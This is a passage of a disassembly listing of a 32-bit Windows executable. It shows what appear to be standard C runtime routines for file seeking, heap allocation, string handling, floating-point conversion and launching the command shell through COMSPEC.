test cl, 80h
jnz short loc_422DB1
call sub_426528
mov dword ptr [eax], 16h
loc_422DA9: ; CODE XREF: sub_422D1B+2D�j
or eax, 0FFFFFFFFh
jmp loc_422E77
; ---------------------------------------------------------------------------
loc_422DB1: ; CODE XREF: sub_422D1B+6B�j
; sub_422D1B+71�j ...
cmp [ebp+var_4], 0
jnz short loc_422DBF
mov eax, [ebp+var_8]
jmp loc_422E77
; ---------------------------------------------------------------------------
loc_422DBF: ; CODE XREF: sub_422D1B+9A�j
test byte ptr [edi+0Ch], 1
jz loc_422E6F
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_422DD8
and [ebp+var_8], ecx
jmp loc_422E6F
; ---------------------------------------------------------------------------
loc_422DD8: ; CODE XREF: sub_422D1B+B3�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:6319E0h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_422E69
push 2
push 0
push [ebp+var_C]
call sub_426CFC
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_422E30
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_422E1B: ; CODE XREF: sub_422D1B+10D�j
cmp eax, ecx
jnb short loc_422E2A
cmp byte ptr [eax], 0Ah
jnz short loc_422E27
inc [ebp+arg_0]
loc_422E27: ; CODE XREF: sub_422D1B+107�j
inc eax
jmp short loc_422E1B
; ---------------------------------------------------------------------------
loc_422E2A: ; CODE XREF: sub_422D1B+102�j
test byte ptr [edi+0Dh], 20h
jmp short loc_422E64
; ---------------------------------------------------------------------------
loc_422E30: ; CODE XREF: sub_422D1B+F6�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_426CFC
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_422E57
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_422E57
test ch, 4
jz short loc_422E5A
loc_422E57: ; CODE XREF: sub_422D1B+12D�j
; sub_422D1B+135�j
mov eax, [edi+18h]
loc_422E5A: ; CODE XREF: sub_422D1B+13A�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_422E64: ; CODE XREF: sub_422D1B+113�j
jz short loc_422E69
inc [ebp+arg_0]
loc_422E69: ; CODE XREF: sub_422D1B+E2�j
; sub_422D1B:loc_422E64�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_422E6F: ; CODE XREF: sub_422D1B+A8�j
; sub_422D1B+B8�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_422E77: ; CODE XREF: sub_422D1B+3C�j
; sub_422D1B+91�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_422D1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E7C proc near ; CODE XREF: sub_40274D+47�p
; sub_40274D+58�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+arg_0]
call sub_42483C
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_422EA8
push [ebp+arg_0]
mov esi, eax
call sub_42488E
add esp, 14h
mov eax, esi
pop esi
pop ebp
retn
sub_422E7C endp
; =============== S U B R O U T I N E =======================================
sub_422EA8 proc near ; CODE XREF: sub_422E7C+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_422F24
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_422EC7
cmp edi, 1
jz short loc_422EC7
cmp edi, 2
jnz short loc_422F24
loc_422EC7: ; CODE XREF: sub_422EA8+13�j
; sub_422EA8+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_422EDE
push esi
call sub_422D1B
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_422EDE: ; CODE XREF: sub_422EA8+27�j
push esi
call sub_42671D
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_422EF3
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_422F07
; ---------------------------------------------------------------------------
loc_422EF3: ; CODE XREF: sub_422EA8+42�j
test al, 1
jz short loc_422F07
test al, 8
jz short loc_422F07
test ah, 4
jnz short loc_422F07
mov dword ptr [esi+18h], 200h
loc_422F07: ; CODE XREF: sub_422EA8+49�j
; sub_422EA8+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_426CFC
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_422F32
; ---------------------------------------------------------------------------
loc_422F24: ; CODE XREF: sub_422EA8+B�j
; sub_422EA8+1D�j
call sub_426528
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_422F32: ; CODE XREF: sub_422EA8+7A�j
pop edi
pop esi
retn
sub_422EA8 endp
; =============== S U B R O U T I N E =======================================
sub_422F35 proc near ; CODE XREF: sub_422F66+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
call sub_426F44
mov esi, eax
test esi, esi
jnz short loc_422F43
pop esi
retn
; ---------------------------------------------------------------------------
loc_422F43: ; CODE XREF: sub_422F35+A�j
push edi
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_426DD4
push esi
mov edi, eax
call sub_42488E
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
sub_422F35 endp
; =============== S U B R O U T I N E =======================================
sub_422F66 proc near ; CODE XREF: sub_40274D+31�p
; sub_416C0B+C2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_422F35
add esp, 0Ch
retn
sub_422F66 endp
; =============== S U B R O U T I N E =======================================
sub_422F79 proc near ; CODE XREF: sub_4028DA+A�p
; sub_402914+12�p ...
arg_0 = dword ptr 4
push dword_6313F8
push [esp+4+arg_0]
call sub_422F8B
pop ecx
pop ecx
retn
sub_422F79 endp
; =============== S U B R O U T I N E =======================================
sub_422F8B proc near ; CODE XREF: sub_422F79+A�p
; sub_423F55+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_422FB4
loc_422F92: ; CODE XREF: sub_422F8B+27�j
push [esp+arg_0]
call sub_422FB7
test eax, eax
pop ecx
jnz short locret_422FB6
cmp [esp+arg_4], eax
jz short locret_422FB6
push [esp+arg_0]
call sub_42700C
test eax, eax
pop ecx
jnz short loc_422F92
loc_422FB4: ; CODE XREF: sub_422F8B+5�j
xor eax, eax
locret_422FB6: ; CODE XREF: sub_422F8B+13�j
; sub_422F8B+19�j
retn
sub_422F8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422FB7 proc near ; CODE XREF: sub_422F8B+B�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423027 SIZE 00000053 BYTES
; FUNCTION CHUNK AT 00423086 SIZE 0000002D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F3A8
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov eax, dword_6319C0
cmp eax, 3
jnz short loc_423027
mov esi, [ebp+arg_0]
cmp esi, dword_6319B8
ja loc_423086
push 9
call sub_428436
pop ecx
and [ebp+var_4], 0
push esi
call sub_427595
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42301E
mov eax, [ebp+var_1C]
test eax, eax
jz short loc_423086
jmp loc_4230A4
sub_422FB7 endp
; =============== S U B R O U T I N E =======================================
sub_42301E proc near ; CODE XREF: sub_422FB7+56�p
; DATA XREF: .text:0042F3B0�o
push 9
call sub_428497
pop ecx
retn
sub_42301E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FB7
loc_423027: ; CODE XREF: sub_422FB7+2B�j
cmp eax, 2
jnz short loc_423086
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_42303B
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_42303E
; ---------------------------------------------------------------------------
loc_42303B: ; CODE XREF: sub_422FB7+7A�j
push 10h
pop esi
loc_42303E: ; CODE XREF: sub_422FB7+82�j
mov [ebp+arg_0], esi
cmp esi, dword_44BA9C
ja short loc_423077
push 9
call sub_428436
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_428038
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42307D
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_4230A4
loc_423077: ; CODE XREF: sub_422FB7+90�j
push esi
jmp short loc_423096
; END OF FUNCTION CHUNK FOR sub_422FB7
; =============== S U B R O U T I N E =======================================
sub_42307A proc near ; DATA XREF: .text:0042F3BC�o
mov esi, [ebp+8]
sub_42307A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42307D proc near ; CODE XREF: sub_422FB7+B4�p
push 9
call sub_428497
pop ecx
retn
sub_42307D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FB7
loc_423086: ; CODE XREF: sub_422FB7+36�j
; sub_422FB7+60�j ...
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_423090
push 1
pop eax
loc_423090: ; CODE XREF: sub_422FB7+D4�j
add eax, 0Fh
and al, 0F0h
push eax
loc_423096: ; CODE XREF: sub_422FB7+C1�j
push 0
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
loc_4230A4: ; CODE XREF: sub_422FB7+62�j
; sub_422FB7+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_422FB7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4230B3 proc near ; CODE XREF: sub_402969+A�p
; sub_402982+73�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423126 SIZE 0000004F BYTES
; FUNCTION CHUNK AT 0042317E SIZE 0000001E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F3C0
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
test esi, esi
jz loc_42318D
mov eax, dword_6319C0
cmp eax, 3
jnz short loc_423126
push 9
call sub_428436
pop ecx
and [ebp+var_4], 0
push esi
call sub_427241
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_42310E
push esi
push eax
call sub_42726C
pop ecx
pop ecx
loc_42310E: ; CODE XREF: sub_4230B3+50�j
or [ebp+var_4], 0FFFFFFFFh
call sub_42311D
cmp [ebp+var_1C], 0
jmp short loc_42316E
sub_4230B3 endp
; =============== S U B R O U T I N E =======================================
sub_42311D proc near ; CODE XREF: sub_4230B3+5F�p
; DATA XREF: .text:0042F3C8�o
push 9
call sub_428497
pop ecx
retn
sub_42311D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230B3
loc_423126: ; CODE XREF: sub_4230B3+36�j
cmp eax, 2
jnz short loc_42317E
push 9
call sub_428436
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
push esi
call sub_427F9C
add esp, 0Ch
mov [ebp+var_24], eax
test eax, eax
jz short loc_423161
push eax
push [ebp+var_20]
push [ebp+var_28]
call sub_427FF3
add esp, 0Ch
loc_423161: ; CODE XREF: sub_4230B3+9D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_423175
cmp [ebp+var_24], 0
loc_42316E: ; CODE XREF: sub_4230B3+68�j
jnz short loc_42318D
push [ebp+arg_0]
jmp short loc_42317F
; END OF FUNCTION CHUNK FOR sub_4230B3
; =============== S U B R O U T I N E =======================================
sub_423175 proc near ; CODE XREF: sub_4230B3+B2�p
; DATA XREF: .text:0042F3D4�o
push 9
call sub_428497
pop ecx
retn
sub_423175 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230B3
loc_42317E: ; CODE XREF: sub_4230B3+76�j
push esi
loc_42317F: ; CODE XREF: sub_4230B3+C0�j
push 0
push dword_6319BC
call dword_42F1F0 ; RtlFreeHeap
loc_42318D: ; CODE XREF: sub_4230B3+28�j
; sub_4230B3:loc_42316E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4230B3
; =============== S U B R O U T I N E =======================================
sub_42319C proc near ; CODE XREF: sub_42321A+4�p
arg_0 = dword ptr 4
push esi
call sub_4285A0
push dword_63199C
call sub_4288FB
mov edx, dword_63199C
pop ecx
mov ecx, dword_631998
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
jnb short loc_423202
push edx
call sub_4288FB
add eax, 10h
push eax
push dword_63199C
call sub_4285CC
add esp, 0Ch
test eax, eax
jnz short loc_4231E5
xor esi, esi
jmp short loc_423211
; ---------------------------------------------------------------------------
loc_4231E5: ; CODE XREF: sub_42319C+43�j
mov ecx, dword_631998
sub ecx, dword_63199C
mov dword_63199C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_631998, ecx
loc_423202: ; CODE XREF: sub_42319C+27�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add dword_631998, 4
mov esi, eax
loc_423211: ; CODE XREF: sub_42319C+47�j
call sub_4285A9
mov eax, esi
pop esi
retn
sub_42319C endp
; =============== S U B R O U T I N E =======================================
sub_42321A proc near ; CODE XREF: .text:00403238�p
; .text:00412058�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42319C
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_42321A endp
; =============== S U B R O U T I N E =======================================
sub_42322C proc near ; DATA XREF: .text:00432020�o
push 80h
call sub_422F79
test eax, eax
pop ecx
mov dword_63199C, eax
jnz short loc_42324D
push 18h
call sub_424FCB
mov eax, dword_63199C
pop ecx
loc_42324D: ; CODE XREF: sub_42322C+12�j
and dword ptr [eax], 0
mov eax, dword_63199C
mov dword_631998, eax
retn
sub_42322C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423260 proc near ; CODE XREF: sub_423B24+28�p
; sub_423B61+34�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_4232D1
sub_423260 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423270 proc near ; CODE XREF: sub_4032AA+C�p
; sub_403B2C+3B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_42328C
loc_42327D: ; CODE XREF: sub_423270+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_4232BF
test ecx, 3
jnz short loc_42327D
loc_42328C: ; CODE XREF: sub_423270+B�j
; sub_423270+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_42328C
mov eax, [ecx-4]
test al, al
jz short loc_4232CE
test ah, ah
jz short loc_4232C9
test eax, 0FF0000h
jz short loc_4232C4
test eax, 0FF000000h
jz short loc_4232BF
jmp short loc_42328C
; ---------------------------------------------------------------------------
loc_4232BF: ; CODE XREF: sub_423270+12�j
; sub_423270+4B�j
lea edi, [ecx-1]
jmp short loc_4232D1
; ---------------------------------------------------------------------------
loc_4232C4: ; CODE XREF: sub_423270+44�j
lea edi, [ecx-2]
jmp short loc_4232D1
; ---------------------------------------------------------------------------
loc_4232C9: ; CODE XREF: sub_423270+3D�j
lea edi, [ecx-3]
jmp short loc_4232D1
; ---------------------------------------------------------------------------
loc_4232CE: ; CODE XREF: sub_423270+39�j
lea edi, [ecx-4]
loc_4232D1: ; CODE XREF: sub_423260+5�j
; sub_423270+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4232F6
loc_4232DD: ; CODE XREF: sub_423270+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_423348
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_4232DD
jmp short loc_4232F6
; ---------------------------------------------------------------------------
loc_4232F1: ; CODE XREF: sub_423270+9E�j
; sub_423270+B8�j
mov [edi], edx
add edi, 4
loc_4232F6: ; CODE XREF: sub_423270+6B�j
; sub_423270+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4232F1
test dl, dl
jz short loc_423348
test dh, dh
jz short loc_42333F
test edx, 0FF0000h
jz short loc_423332
test edx, 0FF000000h
jz short loc_42332A
jmp short loc_4232F1
; ---------------------------------------------------------------------------
loc_42332A: ; CODE XREF: sub_423270+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_423332: ; CODE XREF: sub_423270+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_42333F: ; CODE XREF: sub_423270+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_423348: ; CODE XREF: sub_423270+72�j
; sub_423270+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_423270 endp
; =============== S U B R O U T I N E =======================================
sub_423350 proc near ; CODE XREF: sub_403625+1AF�p
arg_0 = dword ptr 4
cmp dword_449A44, 1
jle short loc_423367
push 4
push [esp+4+arg_0]
call sub_42653A
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_423367: ; CODE XREF: sub_423350+7�j
mov eax, [esp+arg_0]
mov ecx, off_449838
mov al, [ecx+eax*2]
and eax, 4
retn
sub_423350 endp
; =============== S U B R O U T I N E =======================================
sub_423378 proc near ; CODE XREF: sub_425A04+76�p
; sub_425A04+88�p ...
arg_0 = dword ptr 4
cmp dword_449A44, 1
jle short loc_42338F
push 8
push [esp+4+arg_0]
call sub_42653A
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42338F: ; CODE XREF: sub_423378+7�j
mov eax, [esp+arg_0]
mov ecx, off_449838
mov al, [ecx+eax*2]
and eax, 8
retn
sub_423378 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4233B0
loc_4233A0: ; CODE XREF: sub_4233B0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4233B0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4233B0 proc near ; CODE XREF: sub_403625+113�p
; sub_403625+124�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004233A0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_4233B6: ; CODE XREF: sub_4235C0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4233DB
loc_4233C8: ; CODE XREF: sub_4233B0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4233A0
test cl, cl
jz short loc_423424
test edx, 3
jnz short loc_4233C8
loc_4233DB: ; CODE XREF: sub_4233B0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4233E6: ; CODE XREF: sub_4233B0+61�j
; sub_4233B0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_423428
and eax, 81010100h
jz short loc_4233E6
and eax, 1010100h
jnz short loc_423422
and esi, 80000000h
jnz short loc_4233E6
loc_423422: ; CODE XREF: sub_4233B0+68�j
; sub_4233B0+81�j ...
pop esi
pop edi
loc_423424: ; CODE XREF: sub_4233B0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_423428: ; CODE XREF: sub_4233B0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_423465
test al, al
jz short loc_423422
cmp ah, bl
jz short loc_42345E
test ah, ah
jz short loc_423422
shr eax, 10h
cmp al, bl
jz short loc_423457
test al, al
jz short loc_423422
cmp ah, bl
jz short loc_423450
test ah, ah
jz short loc_423422
jmp short loc_4233E6
; ---------------------------------------------------------------------------
loc_423450: ; CODE XREF: sub_4233B0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_423457: ; CODE XREF: sub_4233B0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42345E: ; CODE XREF: sub_4233B0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_423465: ; CODE XREF: sub_4233B0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4233B0 endp
; =============== S U B R O U T I N E =======================================
sub_42346C proc near ; CODE XREF: sub_4284AC+9�p
; sub_428A39+21�p
; DATA XREF: ...
call sub_423484
call sub_428A39
mov dword_6313CC, eax
call sub_4289E9
fnclex
retn
sub_42346C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423484 proc near ; CODE XREF: sub_42346C�p
mov eax, offset sub_428E12
mov off_44BB64, offset sub_428ABC
mov off_44BB60, eax
mov off_44BB68, offset sub_428B22
mov off_44BB6C, offset sub_428A62
mov off_44BB70, offset sub_428B0A
mov off_44BB74, eax
retn
sub_423484 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234BC proc near ; CODE XREF: sub_403625+34�p
; sub_403625+A5�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_4234BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234F0 proc near ; CODE XREF: sub_403B2C+45BE�p
; sub_403B2C+45E3�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_423511
xor eax, eax
jmp short loc_423513
; ---------------------------------------------------------------------------
loc_423511: ; CODE XREF: sub_4234F0+1B�j
mov eax, edi
loc_423513: ; CODE XREF: sub_4234F0+1F�j
cld
pop edi
leave
retn
sub_4234F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423517 proc near ; CODE XREF: sub_403B2C+3B44�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push offset aComspec ; "COMSPEC"
call sub_429187
pop ecx
xor esi, esi
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
cmp ecx, esi
jnz short loc_42354E
cmp eax, esi
jnz short loc_42353E
xor eax, eax
jmp short loc_4235B5
; ---------------------------------------------------------------------------
loc_42353E: ; CODE XREF: sub_423517+21�j
push esi
push eax
call sub_424450
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4235B5
; ---------------------------------------------------------------------------
loc_42354E: ; CODE XREF: sub_423517+1D�j
cmp eax, esi
mov [ebp+var_C], offset dword_42F3E4
mov [ebp+var_8], ecx
mov [ebp+var_4], esi
jz short loc_42358D
lea ecx, [ebp+var_10]
push esi
push ecx
push eax
push esi
call sub_428FED
mov edi, eax
add esp, 10h
cmp edi, 0FFFFFFFFh
jnz short loc_423589
call sub_426528
cmp dword ptr [eax], 2
jz short loc_42358D
call sub_426528
cmp dword ptr [eax], 0Dh
jz short loc_42358D
loc_423589: ; CODE XREF: sub_423517+5C�j
mov eax, edi
jmp short loc_4235B5
; ---------------------------------------------------------------------------
loc_42358D: ; CODE XREF: sub_423517+46�j
; sub_423517+66�j ...
test byte_63146D, 80h
mov [ebp+var_10], offset dword_42F3D8
jnz short loc_4235A4
mov [ebp+var_10], offset aCmd_exe ; "cmd.exe"
loc_4235A4: ; CODE XREF: sub_423517+84�j
lea eax, [ebp+var_10]
push esi
push eax
push [ebp+var_10]
push esi
call sub_428E88
add esp, 10h
loc_4235B5: ; CODE XREF: sub_423517+25�j
; sub_423517+35�j ...
pop edi
pop esi
leave
retn
sub_423517 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4235C0 proc near ; CODE XREF: sub_403B2C+E1F�p
; sub_403B2C:loc_408766�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_42363A
mov dh, [ecx+1]
test dh, dh
jz short loc_423627
loc_4235D8: ; CODE XREF: sub_4235C0+52�j
; sub_4235C0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4235FA
test al, al
jz short loc_4235F4
loc_4235E9: ; CODE XREF: sub_4235C0+32�j
mov al, [esi]
inc esi
loc_4235EC: ; CODE XREF: sub_4235C0+3F�j
cmp al, dl
jz short loc_4235FA
test al, al
jnz short loc_4235E9
loc_4235F4: ; CODE XREF: sub_4235C0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4235FA: ; CODE XREF: sub_4235C0+23�j
; sub_4235C0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4235EC
lea edi, [esi-1]
loc_423604: ; CODE XREF: sub_4235C0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_423633
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4235D8
mov al, [ecx+3]
test al, al
jz short loc_423633
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_423604
jmp short loc_4235D8
; ---------------------------------------------------------------------------
loc_423627: ; CODE XREF: sub_4235C0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_4233B6
; ---------------------------------------------------------------------------
loc_423633: ; CODE XREF: sub_4235C0+49�j
; sub_4235C0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_42363A: ; CODE XREF: sub_4235C0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4235C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423640 proc near ; CODE XREF: sub_40D6A6+20�p
; sub_40FBDB+20�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_42512C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_42367E
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_42368B
; ---------------------------------------------------------------------------
loc_42367E: ; CODE XREF: sub_423640+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_425014
pop ecx
pop ecx
loc_42368B: ; CODE XREF: sub_423640+3C�j
mov eax, esi
pop esi
leave
retn
sub_423640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423690 proc near ; CODE XREF: sub_42962E+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_423690 endp
